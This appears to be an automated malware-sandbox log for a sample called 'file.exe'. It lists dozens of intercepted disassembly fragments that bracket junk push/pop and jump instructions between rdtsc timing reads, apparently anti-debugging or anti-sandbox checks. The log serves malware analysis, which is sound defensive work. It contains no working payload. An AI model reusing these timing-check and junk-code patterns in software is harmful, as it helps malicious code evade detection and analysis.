                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D3B3 second address: A7D3DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F1B74BBC1CCh 0x00000011 jnc 00007F1B74BBC1C6h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D3DB second address: A7D3E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D50B second address: A7D511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D511 second address: A7D517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FA28 second address: A7FA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FA2E second address: A7FA4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F1B751F19E1h 0x0000000b popad 0x0000000c pushad 0x0000000d jl 00007F1B751F19D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7F755 second address: A7F775 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CEh 0x00000007 jns 00007F1B74BBC1C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jp 00007F1B74BBC1CCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A810BC second address: A810DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 jmp 00007F1B751F19DBh 0x0000000c jc 00007F1B751F19D6h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A810DB second address: A810DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A810DF second address: A81112 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19DEh 0x00000007 jmp 00007F1B751F19E7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F1B751F19D6h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81112 second address: A8112E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D3h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8112E second address: A81139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8664A second address: A86650 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A867A6 second address: A867B2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1B751F19D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86CF0 second address: A86D17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jnc 00007F1B74BBC1C6h 0x0000000f popad 0x00000010 jmp 00007F1B74BBC1CAh 0x00000015 push edi 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 pop eax 0x0000001a pop edi 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86D17 second address: A86D39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E0h 0x00000007 jmp 00007F1B751F19DEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86D39 second address: A86D42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8AD61 second address: A8AD65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8AD65 second address: A8AD87 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1B74BBC1C6h 0x00000008 jmp 00007F1B74BBC1D3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8A52F second address: A8A535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8A535 second address: A8A549 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1B74BBC1C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8AAE7 second address: A8AB02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9052D second address: A90531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90531 second address: A90559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F1B751F19D8h 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F1B751F19E7h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F7AED second address: 9F7B23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1B74BBC1D5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F1B74BBC1D5h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F7B23 second address: 9F7B5A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F1B751F19E3h 0x0000000e jmp 00007F1B751F19E9h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F7B5A second address: 9F7B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8EDC1 second address: A8EDE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e jbe 00007F1B751F19DCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F078 second address: A8F07E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F07E second address: A8F08C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F1E3 second address: A8F1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F1E8 second address: A8F1ED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F4EC second address: A8F52F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D9h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push esi 0x00000010 jmp 00007F1B74BBC1D3h 0x00000015 pop esi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007F1B74BBC1CEh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F52F second address: A8F535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34221 second address: A34254 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1B74BBC1C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d ja 00007F1B74BBC1C6h 0x00000013 popad 0x00000014 popad 0x00000015 nop 0x00000016 sub dh, FFFFFFAAh 0x00000019 push 00000004h 0x0000001b movzx edi, bx 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F1B74BBC1D2h 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A96548 second address: A9655A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c je 00007F1B751F19D6h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9655A second address: A9656A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F1B74BBC1CEh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9656A second address: A9656E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A969CD second address: A969DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F1B74BBC1C6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A96CB2 second address: A96CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A975C4 second address: A975C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A975C8 second address: A975EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F1B751F19D8h 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A975EA second address: A975EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97BAC second address: A97BB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97BB2 second address: A97BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97BB8 second address: A97BCB instructions: 0x00000000 rdtsc 0x00000002 js 00007F1B751F19D8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edi 0x0000000b jc 00007F1B751F19D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97E52 second address: A97E66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1B74BBC1CAh 0x00000009 jc 00007F1B74BBC1C6h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99AF8 second address: A99B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop esi 0x00000008 push ecx 0x00000009 pushad 0x0000000a jnp 00007F1B751F19D6h 0x00000010 jmp 00007F1B751F19DCh 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007F1B751F19E4h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 jnc 00007F1B751F19D6h 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1E7E second address: AA1E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA10DB second address: AA10E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1333 second address: AA1339 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA15DF second address: AA15F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1B751F19E0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA15F5 second address: AA15FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA15FE second address: AA1616 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1616 second address: AA1651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007F1B74BBC1D4h 0x0000000e ja 00007F1B74BBC1C6h 0x00000014 jmp 00007F1B74BBC1D1h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1651 second address: AA1655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA18EC second address: AA1910 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F1B74BBC1CBh 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1910 second address: AA1920 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1B751F19D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA91CB second address: AA91D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F1B74BBC1C6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA91D5 second address: AA91EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F1B751F19E2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA91EF second address: AA91F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA950F second address: AA9513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA967E second address: AA9682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9682 second address: AA969B instructions: 0x00000000 rdtsc 0x00000002 js 00007F1B751F19D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F1B751F19DDh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA969B second address: AA96A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA96A0 second address: AA96D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F1B751F19D6h 0x0000000a jmp 00007F1B751F19DDh 0x0000000f popad 0x00000010 jmp 00007F1B751F19E1h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA96D1 second address: AA96D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA96D5 second address: AA96E9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1B751F19D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnc 00007F1B751F19D6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA96E9 second address: AA96F3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1B74BBC1CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9842 second address: AA987B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F1B751F19D6h 0x00000009 jmp 00007F1B751F19E7h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1B751F19E6h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9A00 second address: AA9A0A instructions: 0x00000000 rdtsc 0x00000002 js 00007F1B74BBC1C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9A0A second address: AA9A12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9B76 second address: AA9B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F1B74BBC1C8h 0x0000000e pushad 0x0000000f jmp 00007F1B74BBC1D4h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9E62 second address: AA9E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9E66 second address: AA9E6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9E6A second address: AA9E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 js 00007F1B751F19E0h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA6FD second address: AAA701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA8BB8 second address: AA8BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA8BC2 second address: AA8BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1B74BBC1D1h 0x0000000d jmp 00007F1B74BBC1D9h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB03A2 second address: AB03B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1B751F19DDh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB03B3 second address: AB03D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F1B74BBC1D8h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB03D8 second address: AB03F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1B751F19DCh 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F1B751F19D6h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2B57 second address: AB2B5C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE64A second address: ABE653 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE238 second address: ABE251 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE3AA second address: ABE3B4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1B751F19DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE3B4 second address: ABE3BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC109C second address: AC10CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1B751F19DAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1B751F19E9h 0x00000012 jc 00007F1B751F19D6h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC10CD second address: AC10DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jne 00007F1B74BBC1C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0AE2 second address: AC0AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB7E9 second address: ACB7FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD088D second address: AD08B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1B751F19E5h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
